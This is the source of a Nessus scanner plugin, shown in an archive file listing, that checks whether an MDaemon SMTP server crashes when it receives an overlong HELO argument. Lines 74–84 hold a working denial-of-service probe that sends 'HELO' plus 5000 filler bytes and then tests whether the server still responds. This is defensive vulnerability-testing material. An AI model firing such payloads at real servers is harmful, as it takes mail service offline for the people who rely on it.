home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / mdaemon.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  87 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10136);
  10.  script_bugtraq_id(8555, 8621, 8622);
  11.  script_version ("$Revision: 1.17 $");
  12.  script_cve_id("CAN-1999-0284");
  13.  name["english"] = "MDaemon crash";
  14.  name["francais"] = "Plantage de MDaemon";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "It was possible to crash the 
  18. remote SMTP server by sending a too long
  19. argument to the HELO command. 
  20.  
  21. This problem allows an attacker to make your
  22. SMTP server crash, thus preventing you
  23. from sending or receiving e-mails, which
  24. will affect your work.
  25.  
  26. Solution : contact your vendor for a fix.
  27.  
  28. Risk factor : High";
  29.  
  30.  
  31.  desc["francais"] = "Il s'est avΘrΘ possible de faire
  32. planter le serveur SMTP distant en envoyant
  33. un argument trop long α la commande HELO.
  34.  
  35. Ce problΦme permet α des pirates de faire
  36. planter votre serveur SMTP, vous empechant
  37. ainsi d'envoyer et de recevoir des emails,
  38. ce qui affectera votre travail.
  39.  
  40. Solution : contactez votre vendeur pour un patch.
  41.  
  42. Facteur de risque : SΘrieux";
  43.  
  44.  script_description(english:desc["english"], francais:desc["francais"]);
  45.  
  46.  summary["english"] = "Crashes the remote MTA";
  47.  summary["francais"] = "Fait planter le MTA distant";
  48.  script_summary(english:summary["english"], francais:summary["francais"]);
  49.  
  50.  script_category(ACT_DENIAL);
  51.  
  52.  
  53.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  54.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  55.  family["english"] = "Denial of Service";
  56.  family["francais"] = "DΘni de service";
  57.  script_family(english:family["english"], francais:family["francais"]);
  58.  script_dependencie("find_service.nes", "sendmail_expn.nasl");
  59.  script_exclude_keys("SMTP/wrapped");
  60.  script_require_ports("Services/smtp", 25);
  61.  exit(0);
  62. }
  63.  
  64. #
  65. # The script code starts here
  66. #
  67.  
  68. include("smtp_func.inc");
  69.  
  70. port = get_kb_item("Services/smtp");
  71. if(!port)port = 25;
  72. if(get_port_state(port))
  73. {
  74.  soc = open_sock_tcp(port);
  75.  if(soc)
  76.  {
  77.   d = smtp_recv_banner(socket:soc);
  78.   s = string("HELO ", crap(5000), "\r\n");
  79.   send(socket:soc, data:s);
  80.   close(soc);
  81.   
  82.   soc2 = open_sock_tcp(port);
  83.   if(!soc2)security_hole(port);
  84.   else close(soc2);
  85.  }
  86. }
  87.